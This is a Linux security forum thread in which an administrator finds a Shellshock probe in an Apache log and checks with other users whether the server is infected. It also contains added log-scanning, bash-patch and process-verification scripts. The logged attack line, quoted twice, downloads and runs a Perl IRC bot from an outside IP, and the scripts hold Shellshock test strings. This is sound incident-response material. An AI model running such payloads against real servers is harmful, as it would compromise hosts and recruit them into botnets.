LinuxQuestions.org, Linux - Security forum
09-27-2014, 04:20 PM   #1   Habitual (LQ Veteran)
Shellshock found in http logs


Found this today in the logs:
Code:
192.227.213.66 - - [27/Sep/2014:10:33:07 -0700] "GET /cgi-bin/hi HTTP/1.0" 404 411 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
I curl'd http://213.5.67.223/jurat and it appears to be an IRC-based "something".
I am not comfortable ignoring this because it shows a 404.

I scanned 46.16.178.158 and I can see Unreal ircd running on several ports including 443 shown in the jurat file.

For now, I simply added those two IPs to the firewall.

/tmp, is of course empty.

Code:
apt-get changelog bash | less
Get:1 Changelog for bash (http://changelogs.ubuntu.com/changelogs/pool/main/b/bash/bash_4.2-2ubuntu2.5/changelog) [108 kB]
bash (4.2-2ubuntu2.5) precise-security; urgency=medium

  * SECURITY UPDATE: out-of-bounds memory access
    - debian/patches/CVE-2014-718x.diff: guard against overflow and fix
      off-by-one in bash/parse.y.
    - CVE-2014-7186
    - CVE-2014-7187
  * SECURITY IMPROVEMENT: use prefixes and suffixes for function exports
    - debian/patches/variables-affix.diff: add prefixes and suffixes in
      bash/variables.c.

 -- Marc Deslauriers <marc.deslauriers@ubuntu.com>  Fri, 26 Sep 2014 13:27:53 -0400

bash (4.2-2ubuntu2.3) precise-security; urgency=medium

  * SECURITY UPDATE: incomplete fix for CVE-2014-6271
    - debian/patches/CVE-2014-7169.diff: fix logic in bash/parse.y.
    - CVE-2014-7169

 -- Marc Deslauriers <marc.deslauriers@ubuntu.com>  Thu, 25 Sep 2014 02:11:10 -0400

bash (4.2-2ubuntu2.2) precise-security; urgency=medium

  * SECURITY UPDATE: incorrect function parsing
    - debian/patches/CVE-2014-6271.diff: fix function parsing in
      bash/builtins/common.h, bash/builtins/evalstring.c, bash/variables.c.
    - CVE-2014-6271

 -- Marc Deslauriers <marc.deslauriers@ubuntu.com>  Mon, 22 Sep 2014 15:31:07 -0400

Advice requested and appreciated.

Thanks.

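The two things the post above does by hand (reading the probe out of the access log, and checking whether the local bash is patched) collected into one script. This is an added example, not code from the thread or from anyone in it. The sample log is constructed: its first line reproduces the probe from the post (same client IP, path and payload URL), the other two lines are made up. The bash tests are the publicly circulated checks for CVE-2014-6271 and CVE-2014-7169; function names are my own.

```shell
#!/bin/sh
# Added example, not code from the thread. Two checks an admin would run after
# seeing the log line above: (1) pull every Shellshock-style probe out of an
# access log and list the hosts the payloads fetch from, (2) test the local
# bash for CVE-2014-6271 and the follow-up CVE-2014-7169.

# Constructed sample log (combined format). Line 1 reproduces the probe from
# the post; lines 2-3 are made-up filler, one benign and one second probe.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
192.227.213.66 - - [27/Sep/2014:10:33:07 -0700] "GET /cgi-bin/hi HTTP/1.0" 404 411 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
203.0.113.9 - - [27/Sep/2014:10:35:00 -0700] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Sep/2014:10:36:12 -0700] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "() {:;}; /bin/sh -c \"id\""
EOF

# The signature is the exported-function prefix "() {", not a particular
# header: any request header a CGI handler copies into the environment
# (User-Agent, Referer, Cookie, ...) can carry it, so match the whole line.
SHELLSHOCK_RE='\(\)[[:space:]]*\{'

# Print "client path status" for every probe. A 404, as in the post, only
# means that URL was missing; a 200 on a /cgi-bin/ path that spawns a shell
# is the line to worry about.
shellshock_hits() {
    grep -E "$SHELLSHOCK_RE" "$1" | awk '{ print $1, $7, $9 }'
}

shellshock_hit_count() {
    grep -cE "$SHELLSHOCK_RE" "$1"
}

# URLs the injected commands download from: candidates for the firewall and
# for checking whether anything on this host ever connected to them.
shellshock_callbacks() {
    grep -E "$SHELLSHOCK_RE" "$1" | grep -oE 'https?://[^ "\\;]+' | sort -u
}

# CVE-2014-6271: a function definition in an environment variable with
# trailing commands. A vulnerable bash runs the trailing "echo vulnerable".
bash_cve_2014_6271() {
    if env x='() { :;}; echo vulnerable' bash -c 'true' 2>/dev/null | grep -q vulnerable; then
        echo vulnerable
    else
        echo patched
    fi
}

# CVE-2014-7169 (the incomplete-fix follow-up): on an unpatched bash the
# dangling redirection in the variable makes "echo date" create a file
# named "echo" in the current directory instead of printing.
bash_cve_2014_7169() {
    d=$(mktemp -d)
    ( cd "$d" && env X='() { (a)=>\' bash -c 'echo date' ) >/dev/null 2>&1 || true
    if [ -e "$d/echo" ]; then r=vulnerable; else r=patched; fi
    rm -rf "$d"
    echo "$r"
}

echo "probes found: $(shellshock_hit_count "$SAMPLE_LOG")"
shellshock_hits "$SAMPLE_LOG"
echo "payload hosts:"
shellshock_callbacks "$SAMPLE_LOG"
echo "bash CVE-2014-6271: $(bash_cve_2014_6271)"
echo "bash CVE-2014-7169: $(bash_cve_2014_7169)"
```

Run it as-is against the embedded sample, or point `shellshock_hits` and `shellshock_callbacks` at a real access log. The log scan is deliberately independent of the bash test: a patched bash tells you new probes will fail, it says nothing about what happened before the patch was applied, which is why the 200-status hits matter more than the 404 in the post.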
 
09-27-2014, 05:39 PM   #2   Smokey_justme
Hmm... IRC controlled bot with tcpflooder, udpflooder and spreader and minimal shell control... I'm not sure if it tries to hide as the atd daemon or uses it to schedule itself for execution (but I can't find where it does this, so my best bet is that it tries to hide as "atd").. I would do a "ps aux | grep atd" and close any atd (if you know it shouldn't run).. Hmm.. I just realized how rusty my Perl is
 
09-27-2014, 05:46 PM   #3   Smokey_justme
Ok... The bot is very similar to the one described here: http://handlers.sans.org/jullrich/perlbot.html

It just exploits a different bug and hides itself as a different process..
 
09-27-2014, 05:51 PM   #4   Habitual (Original Poster)
Thanks Smokey_justme:

Code:
ps aux | grep atd
daemon     814  0.0  0.0  16908   164 ?        Ss   Sep26   0:00 atd
root     31092  0.0  0.0   8104   928 pts/0    S+   15:40   0:00 grep --color=auto atd

root@web:~# lsof -p 814
COMMAND PID   USER   FD   TYPE DEVICE SIZE/OFF   NODE NAME
atd     814 daemon  cwd    DIR  202,1     4096 144612 /var/spool/cron/atjobs
atd     814 daemon  rtd    DIR  202,1     4096      2 /
atd     814 daemon  txt    REG  202,1    23152   8081 /usr/sbin/atd
atd     814 daemon  mem    REG  202,1    52120 139250 /lib/x86_64-linux-gnu/libnss_files-2.15.so
atd     814 daemon  mem    REG  202,1    47680 139448 /lib/x86_64-linux-gnu/libnss_nis-2.15.so
atd     814 daemon  mem    REG  202,1    97248 145848 /lib/x86_64-linux-gnu/libnsl-2.15.so
atd     814 daemon  mem    REG  202,1    35680 138615 /lib/x86_64-linux-gnu/libnss_compat-2.15.so
atd     814 daemon  mem    REG  202,1    14768 145346 /lib/x86_64-linux-gnu/libdl-2.15.so
atd     814 daemon  mem    REG  202,1  1811128 138163 /lib/x86_64-linux-gnu/libc-2.15.so
atd     814 daemon  mem    REG  202,1    55744 134835 /lib/x86_64-linux-gnu/libpam.so.0.83.0
atd     814 daemon  mem    REG  202,1   149280 144960 /lib/x86_64-linux-gnu/ld-2.15.so
atd     814 daemon    0u   CHR    1,3      0t0   4763 /dev/null
atd     814 daemon    1u   CHR    1,3      0t0   4763 /dev/null
atd     814 daemon    2u   CHR    1,3      0t0   4763 /dev/null
atd     814 daemon    3uW  REG   0,15        4   7698 /run/atd.pid
Given the low PID, I'd venture a guess that atd is supposed to be running...
No new crons, rkhunter results are as expected.

My concern is that perl processes can fork and hide as discussed here...

Good stuff at http://handlers.sans.org/jullrich/perlbot.html - Thanks.

Pasted at pastebin.com 2 days ago - http://pastebin.com/gQ3wz2ET

 
09-27-2014, 06:01 PM   #5   Smokey_justme
Hmm.. Low PIDs are not an indicator of a clean process (well, they are, but PIDs are reusable so I wouldn't risk making a security judgment based on them)...
But it just hit me who the user is, since the false "atd" process would be running as the same user as the web server.. So.. yeah.. you don't have to worry about being infected..

It's however pretty scary stuff when we start thinking about how many servers are out there with an unfixed bash... Mrrr.. And I used to think that only Windows machines can be used as bot-farms..
 
09-27-2014, 06:15 PM   #6   Habitual (Original Poster)
Well, if it was masquerading as atd, wouldn't lsof 'find' whatever processes were running from it as a result?
Assuming lsof hadn't been messed with?

Code:
stat /run/atd.pid
  File: `/run/atd.pid'
  Size: 4         	Blocks: 8          IO Block: 4096   regular file
Device: fh/15d	Inode: 7698        Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2014-09-26 06:41:01.925729001 -0700
Modify: 2014-09-26 06:41:01.925729001 -0700
Change: 2014-09-26 06:41:01.925729001 -0700
 Birth: -
root@web:~# cat /run/atd.pid
814
root@web:~# uptime
 16:06:51 up 1 day,  9:26,  1 user,  load average: 0.00, 0.06, 0.19
Code:
apt-get changelog lsof | less
Get:1 Changelog for lsof (http://changelogs.ubuntu.com/changelogs/pool/main/l/lsof/lsof_4.81.dfsg.1-1build1/changelog) [10.6 kB]
lsof (4.81.dfsg.1-1build1) lucid; urgency=low

  * rebuild rest of main for armel armv7/thumb2 optimization;
    UbuntuSpec:mobile-lucid-arm-gcc-v7-thumb2

 -- Alexander Sack <asac@ubuntu.com>  Sun, 07 Mar 2010 00:56:30 +0100
matches "Modify" in stat output...
Code:
stat -c%y /usr/bin/lsof
2010-03-06 19:33:48.000000000 -0800
Thanks for your time.
 
09-27-2014, 06:19 PM   #7   Smokey_justme
Hmmm... you've gone to great lengths just to prove that I'm right about you not being infected? Am I misreading your post or are you misreading mine?

I'm sorry if you're upset about me commenting about you basing a conclusion on the PID... I really am.. I should have just let it be
 
09-27-2014, 06:21 PM   #8   Habitual (Original Poster)
Quote (Smokey_justme):
Hmmm... you've gone to great lengths just to prove that I'm right about you not being infected? Am I misreading your post or are you misreading mine?

I'm sorry if you're upset about me commenting about you basing a conclusion on the PID... I really am.. I should have just let it be

I'm just trying to verify that my thought processes and technique on such important matters are sound.

 
09-27-2014, 06:27 PM   #9   Smokey_justme
Quote (Habitual):
I'm just trying to verify that my thought processes and technique on such important matters are sound.

Well, it seems to be.. If it looks like a horse and smells like a horse.. It's either the NSA disguised as a zebra or an actual horse...
 
09-27-2014, 08:10 PM   #10   Habitual (Original Poster)
Well, I'm glad someone else thinks so!

Thanks for all your feedback.

and just in case someone lands here in x years, I ran this also:
Code:
ps -p 814 -o lstart | tail -1 && last reboot | head -1
Fri Sep 26 06:41:01 2014
reboot   system boot  3.2.0-69-virtual Fri Sep 26 06:41 - 18:17 (1+11:36)
and that shows me that atd has been running since last system boot.

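The checks the thread works through by hand (binary behind the PID via lsof, pidfile contents, process start time versus last reboot) collected into one script, as an added example rather than anything posted here. It reads /proc/PID/exe and /proc/PID/stat directly instead of trusting the name column of ps, which also covers the PID-reuse objection raised in #5: a recycled low PID that started hours after boot fails the start-time check. Function names are my own; the PID, binary path and pidfile in the usage comment are the ones from this thread, used only as an illustration.

```shell
#!/bin/sh
# Added example, not code from the thread. Checks whether a PID really is the
# daemon it appears to be, reading /proc directly instead of trusting the
# name in "ps aux" (a bot can call itself "atd"; it cannot easily fake
# /proc/PID/exe or its start time). The PID, path and pidfile in the usage
# comment at the bottom are the thread's, used as an illustration only.

# Boot time in seconds since the epoch, from the btime line of /proc/stat.
boot_epoch() {
    awk '/^btime/ { print $2 }' /proc/stat
}

# Start time of a PID in seconds since the epoch. Field 22 of /proc/PID/stat
# is the start time in clock ticks after boot; the comm field (2) can hold
# spaces and parentheses, so fields are counted after the closing ")" and
# field 22 becomes field 20 of the remainder.
proc_start_epoch() {
    ticks=$(getconf CLK_TCK 2>/dev/null || echo 100)
    start_ticks=$(sed 's/^.*) //' "/proc/$1/stat" | awk '{ print $20 }')
    echo $(( $(boot_epoch) + start_ticks / ticks ))
}

# The binary the process was exec'd from. readlink prints " (deleted)" after
# the path when the file was replaced or removed after the process started,
# which is itself worth investigating for a long-running daemon.
proc_exe() {
    readlink "/proc/$1/exe"
}

# Pure comparison, so it can be checked without a live process: did the
# process start within SLACK seconds after boot?
started_at_boot() {
    start=$1; boot=$2; slack=$3
    [ $(( start - boot )) -ge 0 ] && [ $(( start - boot )) -le "$slack" ]
}

# Does the daemon's pidfile name this PID? (Whitespace-tolerant.)
pidfile_matches() {
    [ -r "$1" ] && [ "$(tr -d '[:space:]' < "$1")" = "$2" ]
}

# verify_daemon PID EXPECTED_EXE [PIDFILE] [SLACK]
# Prints one line per mismatch and a summary; returns 0 only if all agree.
verify_daemon() {
    pid=$1; expected=$2; pidfile=$3; slack=${4:-300}; ok=1
    exe=$(proc_exe "$pid" 2>/dev/null || echo '<unreadable>')
    if [ "$exe" != "$expected" ]; then
        echo "pid $pid: exe is $exe, expected $expected"; ok=0
    fi
    if [ -n "$pidfile" ] && ! pidfile_matches "$pidfile" "$pid"; then
        echo "pid $pid: $pidfile does not contain this pid"; ok=0
    fi
    if ! started_at_boot "$(proc_start_epoch "$pid")" "$(boot_epoch)" "$slack"; then
        echo "pid $pid: started more than ${slack}s after boot"; ok=0
    fi
    if [ "$ok" -eq 1 ]; then
        echo "pid $pid: exe, pidfile and start time all consistent with $expected"
    fi
    [ "$ok" -eq 1 ]
}

# Usage on the box from the thread: verify_daemon 814 /usr/sbin/atd /run/atd.pid
if [ $# -ge 2 ]; then
    verify_daemon "$@"
fi
```

Three caveats that the script does not remove. It runs as root on the same kernel it is asking about, so a kernel-level rootkit can lie to it just as it can lie to lsof; the thread's comparison of the lsof binary's mtime against its package changelog is the same trust question one level down. A process that was started at boot can still have been replaced in memory later, which is what the "(deleted)" suffix on the exe link helps catch. And the 300-second default slack is an assumption chosen for a typical init sequence; on a slow boot, widen it rather than ignore the check.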
 
All times are GMT -5.